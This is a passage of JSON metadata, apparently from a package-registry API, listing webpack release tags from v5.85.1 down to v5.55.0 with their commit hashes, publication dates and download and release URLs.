cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.